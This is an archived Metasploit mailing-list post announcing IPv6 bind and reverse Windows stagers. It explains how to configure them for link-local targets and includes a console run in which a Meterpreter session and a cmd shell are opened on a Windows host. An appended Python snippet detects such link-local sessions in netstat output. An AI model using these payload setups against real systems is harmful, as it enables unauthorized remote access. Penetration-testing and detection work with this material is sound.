Metasploit mailing list archives

Microsoft Windows IPv6 Stagers


From: hdm at metasploit.com (H D Moore)
Date: Fri, 22 Aug 2008 02:03:19 -0500

I added two new IPv6 Windows stagers tonight, these work with the shell, 
meterpreter, vncinject, and other common stages over the IPv6 protocol. 
Unfortunately, I don't have time to really document it tonight, but I 
wrote up a quick summary of how to use them:

To use the new payloads, set the PAYLOAD to one of the reverse_ipv6_tcp or 
bind_ipv6_tcp payload options after updating via SVN.

For the reverse_ipv6_tcp payload, you need to specify LPORT and LHOST. 
LPORT works like normal, but LHOST must be your own valid IPv6 address. 
If you are using link-local addresses (fe80::*), there is a snag: for the 
reverse payload to work, you must tell the target which interface to use 
to connect back on. This is accomplished by setting the SCOPEID variable 
to match the number after the "%" in the IPv6 address in Windows. You can 
see your IPv6 link-local address in Windows via "ipconfig". For example, 
if ipconfig on the target shows "fe80::48d9:700b:a573:39a3%19", then set 
the SCOPEID to 19. If you are not using link-local addresses, this isn't 
an issue (SCOPEID of 0 should always work).

For the bind_ipv6_tcp payload, you need to specify LPORT like normal, but 
there are some hoops for the RHOST. In the case of the bind payloads, 
RHOST tells the handler which address to connect to. Once again, 
link-local addresses make this tricky. When using a Linux machine as the 
Metasploit source, you need to append "%<interface>" after the RHOST IPv6 
address of the target. Replace "interface" with the name of the local 
Linux interface for the network connecting you to the target. For 
example, if we are attacking "fe80::48d9:700b:a573:39a3", and I am 
connected via "eth0" to the network where this host resides, I would 
specify RHOST as "fe80::48d9:700b:a573:39a3%eth0". 

To summarize -- if you have a Linux machine and are attacking Windows and 
both machines have IPv6 enabled (default for most Linux distros, default 
for all newer Windows versions), then you can use Metasploit to launch 
attacks over IPv6. If you are using real IPv6 addresses, this is much 
easier, since you shouldn't have to care about the scope_id. If you are 
attacking FROM Windows, this won't work, because the stock version of 
Ruby for Win32 doesn't support IPv6. If you are attacking from Mac OS X 
or some BSD variant, it might work, it might not, drop me an email and 
let me know.

Enjoy pwning the "new" internet,

-HD

-- sample exploit run (using handler) --


msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
PAYLOAD => windows/meterpreter/bind_ipv6_tcp

msf exploit(handler) > set LPORT 12345
LPORT => 12345

msf exploit(handler) > set RHOST fe80::5569:1438:c2c2:722e%eth0
RHOST => fe80::5569:1438:c2c2:722e%eth0

msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (fe80::21b:63ff:fe98:bf36%eth0:37510 -> fe80::5569:1438:c2c2:722e%eth0:12345)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: BOOM\hdm
meterpreter > sysinfo
Computer: BOOM
OS      : Windows 2000 (Build 6001, Service Pack 1).
meterpreter > execute -f cmd -i
Process 4868 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\shared>netstat -na
netstat -na

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING
  [ snip ]
  TCP    [fe80::5569:1438:c2c2:722e%9]:12345  [fe80::21b:63ff:fe98:bf36%9]:37510  ESTABLISHED
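The two zone-ID conventions the post runs into (Windows puts a numeric interface index after the "%", Linux an interface name) and the tell-tale netstat line at the end are worth being able to parse on the defending side. The following is an added example, not code from the post or from Metasploit: it splits a scoped IPv6 address into address and zone, classifies the zone, and scans a constructed netstat -na sample (modelled on the output above) for established TCP sessions that involve a link-local fe80::/10 endpoint, which is the pattern a link-local IPv6 bind or reverse stager leaves behind.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Constructed sample of Windows "netstat -na" output, modelled on the run in
# the post; not captured from a real host. Windows writes the zone index
# after '%' as a number ("%9"); Linux writes the interface name ("%eth0").
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    [fe80::5569:1438:c2c2:722e%9]:12345  [fe80::21b:63ff:fe98:bf36%9]:37510  ESTABLISHED
  TCP    [2001:db8::10]:443     [2001:db8::20]:51000   ESTABLISHED
"""


def split_scope(addr: str) -> Tuple[ipaddress.IPv6Address, Optional[str]]:
    """Split 'fe80::1%9' or 'fe80::1%eth0' into (address, zone or None)."""
    host, sep, zone = addr.partition("%")
    return ipaddress.IPv6Address(host), (zone if sep else None)


def zone_kind(zone: Optional[str]) -> str:
    """'index' for a Windows-style numeric SCOPEID, 'ifname' for a Linux name."""
    if zone is None:
        return "none"
    return "index" if zone.isdigit() else "ifname"


# One Windows netstat line whose endpoints are bracketed IPv6 addresses.
_LINE = re.compile(
    r"^\s*TCP\s+\[([^\]]+)\]:(\d+)\s+\[([^\]]+)\]:(\d+)\s+(\w+)\s*$")


def linklocal_established(netstat_text: str) -> List[Tuple[str, int, str, int]]:
    """Return (local, lport, foreign, fport) for ESTABLISHED TCP sessions in
    which either endpoint is a link-local (fe80::/10) address."""
    hits = []
    for line in netstat_text.splitlines():
        m = _LINE.match(line)
        if not m or m.group(5) != "ESTABLISHED":
            continue
        local, foreign = m.group(1), m.group(3)
        lip, _ = split_scope(local)
        fip, _ = split_scope(foreign)
        if lip.is_link_local or fip.is_link_local:
            hits.append((local, int(m.group(2)), foreign, int(m.group(4))))
    return hits
```

On a real host the same scan can be fed the output of `netstat -na` directly; connections on the global 2001:db8:: addresses in the sample are deliberately not reported.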